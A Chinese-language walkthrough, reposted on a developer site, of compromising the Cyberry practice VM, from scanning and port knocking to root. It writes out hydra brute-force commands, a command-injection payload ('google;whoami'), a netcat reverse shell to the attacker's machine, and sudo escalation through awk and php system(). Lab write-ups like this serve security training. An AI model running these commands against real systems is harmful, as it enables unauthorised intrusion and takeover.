Cyberry靶机渗透测试

栏目: 编程工具 · 发布时间: 6年前

内容简介:靶机ip:192.168.107.132攻击机kali:192.168.107.134

Cyberry靶机渗透测试

环境准备

靶机ip:192.168.107.132

攻击机kali:192.168.107.134

说明:目的是拿下靶机并获取root权限

渗透测试

首先nmap开路,找一下靶机的ip地址 nmap -sP 192.168.107.1/24 Cyberry靶机渗透测试 既然确定了ip,接着我们扫一下端口。 Cyberry靶机渗透测试 开了三个端口,1个web端口80,1个ssh端口22,1个ftp端口21.我们先从web服务开始。 Cyberry靶机渗透测试 一个静态页面,没什么搞头,扫一下目录。 Cyberry靶机渗透测试 我先从phpmyadmin下手, Cyberry靶机渗透测试 这里尝试爆破弱口令,结果失败,看来不是从这里入手,接着去/login.php界面看看,试了半天,好像也不是什么注入,结果发现这里有点东西, Cyberry靶机渗透测试 点进去, Cyberry靶机渗透测试 前面几个点进去是404,这一个就有东西了, Cyberry靶机渗透测试 这样一张图片。用图片编辑器调一下, Cyberry靶机渗透测试 这里就很有意思了,有四个人,最上方还有一部分,出现了PORT字样,一时半会有些蒙蔽,但是显然这个靶机入口就在这里了(总不会无缘无故给一张这样的图吧- -)。然后,我分别把这四个人截图下来,用浏览器的识别功能去查了这四个人,了解了一下各个人的信息,这四个人分别是Smiley Lewis, Dave Edmunds, Fats Domino和Gale Storm,首先,他们都是艺术家,都演奏了同一首歌曲,名字叫,”I hear you knocking”,年份分别是,1970,1955,1955,1961,这差不多是共同点了,还是很蒙蔽0.0,这里结合了知识面和脑洞。。原来跟knock有关,linux下有个命令knock可供安装使用, 端口试探(port knocking) 是一种通过连接尝试,从外部打开原先关闭端口的方法。一旦收到正确顺序的连接尝试,防火墙就会动态打开一些特定的端口给允许尝试连接的主机,知道这个就明白上面那个PORT的意思了,显然是有某个端口没有被打开,需要我们knock开。那年份就要用上了,从左上依次到右下 knock 192.168.107.132 1970 1955 1955 1961 。knock之后,再来扫描端口,从1-65535 Cyberry靶机渗透测试 发现了一个端口开放了,我们访问, Cyberry靶机渗透测试 还是这个页面,但是既然端口不一样,那肯定存在的页面也会有差异,我们这次使用kali下的dirb扫描目录, Cyberry靶机渗透测试 这里,多了个H目录,访问, Cyberry靶机渗透测试 这种语言在CTF中见过,brain-fuck,于是乎,Google一个在线翻译,解密,内容如下, Cyberry靶机渗透测试 明显上面几个是用户名,下面pw那个是密码,想到前面开了ftp和ssh,把目标转向了ssh和ftp,先看看能不能登陆ssh,这里我用hydra进行爆破,先把刚才的用户名和密码保存在本地 Cyberry靶机渗透测试 .hydra命令如下, hydra -L /root/user.txt -P /root/pw.txt ssh://192.168.107.132 -t 6 Cyberry靶机渗透测试 爆破成功,直接去登陆ssh, ssh mary@192.168.107.132 。结果登不进去 Cyberry靶机渗透测试 被墙了?不知道。。总之就是我们被拒绝了,ssh这条路看来走不通了。。。换个思路,爆破ftp。 Cyberry靶机渗透测试 还是这个用户名和密码, ftp 192.168.107.132 Cyberry靶机渗透测试 成功登陆,接着,用 ls -la 看看文件, Cyberry靶机渗透测试 在.bash_history目录,发现有两个文件,get到kali本地,命令, get .trash get .reminder.enc 。接着到本地看看文件类型, Cyberry靶机渗透测试 一个是openssl enc加密,一个是文本,我们看看文本内容 Cyberry靶机渗透测试 应该就是密码了,网上找了个脚本,直接放在命令行用,

for i in `openssl enc -ciphers | tail -n +2` ; do for j in `cat .trash`; do openssl ${i:1} -d -salt -md md5 -in .reminder.enc -out "decrypted$i$j" -k $j; done;done 2>/dev/null
Cyberry靶机渗透测试 解密完后, Cyberry靶机渗透测试 找一下我们想要的文本文件, file * | grep "text" Cyberry靶机渗透测试 cat 查看一下, Cyberry靶机渗透测试 这个dangleberry69大概就是什么登陆密码,好像暂时没什么地方用到登陆了,别忘了我们web网站上还有一个登陆处,用mary和拿到的密码去登陆一下, http://192.168.107.132:61955/login.php Cyberry靶机渗透测试 登陆成功,页面有两个链接,第一个就是一个视频播放,没什么用,第二个是个DNS解析的页面。 Cyberry靶机渗透测试 只给了一个yahoo和google,看着像是一个代码执行的洞,我尝试在前台修改一下,看看能不能执行其他的东西 Cyberry靶机渗透测试 修改,添加 google;whoami 。然后,提交 Cyberry靶机渗透测试 果然,执行了代码,这样,我便想反弹一个shell,先在攻击机上执行 nc -lvp 4444 Cyberry靶机渗透测试 接着,在前台修改value值为 google;nc -e /bin/bash 192.168.107.133 4444 Cyberry靶机渗透测试 等几秒钟,查看攻击机 Cyberry靶机渗透测试 已经反弹到 shell 了,看着很不舒服,用 python 引入一个交互式shell, python -c "import pty;pty.spawn('/bin/bash')" Cyberry靶机渗透测试 查看当前目录下的文件,有个nb-latin,查看内容 Cyberry靶机渗透测试 看着要不是用户名,要不就是密码,先下载到攻击机上,shell上命令 nc -w 3 192.168.107.132 4444< nb-latin kali终端上 nc -lvp 4444 > pass.txtCyberry靶机渗透测试 用之前的用户名字典和这个密码字典试试ssh登陆,还是上hydra, hydra -L /root/user.txt -P /root/pass.txt ssh://192.168.107.132 -t 6 Cyberry靶机渗透测试

登陆ssh,这下成功了,没有出错,看下文件,运行sh

Cyberry靶机渗透测试 发现我们基本上没有权限,什么都运行不了,应该会有个地方有权限的设定,于是想到了 sudo -l 命令,列出目前用户可执行的指令, Cyberry靶机渗透测试 确实,我们可以用terry的权限去执行刚才那两个我们没有权限的文件,命令 sudo -u terrt ./invoke.sh , Cyberry靶机渗透测试 通过测试,我发现需要带一个参数,而且这个参数是将要被打开的文件 ,我试着把参数改为/bin/bash,发现,我们用户切换为terry了 Cyberry靶机渗透测试 同样,用上面的方法 sudo -l ,发现有一个文件可以用halle的权限去执行, Cyberry靶机渗透测试 这里的这个文件是awk,awk是 linux 下一种文本处理工具,有他自己的语法,按照这个思路,我们需要通过awk的命令,将用户变为halle,用BEGIN命令,引入system全局变量,执行/bin/bash, sudo -u halle awk 'BEGIN{system("/bin/bash")}' ,发现我们已经变成halle了, Cyberry靶机渗透测试 再进行 sudo -l , Cyberry靶机渗透测试 halle可以用chuck的权限执行php,这里踩坑了,最后做法是,我们写一个 php 文件去执行系统命令,然后用php文件去读chuck目录下的文件,先将文件写入/tmp目录,因为/tmp目录一般来说都可以读, echo "<?php system('ls -la /home/chuck')?>" > /tmp/1.php ,然后用 sudo -u chuck /usr/bin/php /tmp/1.php 执行,可以发现执行成功了。(注意,直接打开/tmp/1.php是没有权限的,只有用chuck的身份去打开) Cyberry靶机渗透测试 我们再去写一个读.deleted目录下的文件, echo "<?php system('ls -la /home/chuck/.deleted')?>" > /tmp/1.php .接着 sudo -u chuck /usr/bin/php /tmp/1.php .执行, Cyberry靶机渗透测试 有两个文件,先看看ssh_stuff里有什么, Cyberry靶机渗透测试 发现了rsa公钥,但没法进行免密登陆ssh,我们条件没法实现,所以看看另一个文件deleted, Cyberry靶机渗透测试 打开后,发现了类似密码的邮件, Cyberry靶机渗透测试 Cyberry靶机渗透测试 右侧文本文件是我自己创建的记录,开头是che,结尾是rry,中间有baca,还有一些字母出现次数的说明,那么接下来就是爆破密码了,直接暴力,用kali下的自带工具 crunch 生成密码 Cyberry靶机渗透测试 由于文件有点大,先生成好,再把他们合成为一个文件。 Cyberry靶机渗透测试 接着用hydra爆破。爆了一万年。。 Cyberry靶机渗透测试 接着直接登陆ssh, Cyberry靶机渗透测试

可以看到已经是root了,至此靶机提升root已完成。

参考链接

http://www.sohu.com/a/161766202_709042 【tty交互式shell】

https://en.wikipedia.org/wiki/Port_knocking 【Port_knocking】

http://www.runoob.com/linux/linux-comm-awk.html 【awk】


以上所述就是小编给大家介绍的《Cyberry靶机渗透测试》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Hit Refresh

Hit Refresh

Satya Nadella、Greg Shaw / HarperBusiness / 2017-9-26 / USD 20.37

Hit Refresh is about individual change, about the transformation happening inside of Microsoft and the technology that will soon impact all of our lives—the arrival of the most exciting and disruptive......一起来看看 《Hit Refresh》 这本书的介绍吧!

SHA 加密
SHA 加密

SHA 加密工具

XML、JSON 在线转换
XML、JSON 在线转换

在线XML、JSON转换工具

HEX HSV 转换工具
HEX HSV 转换工具

HEX HSV 互换工具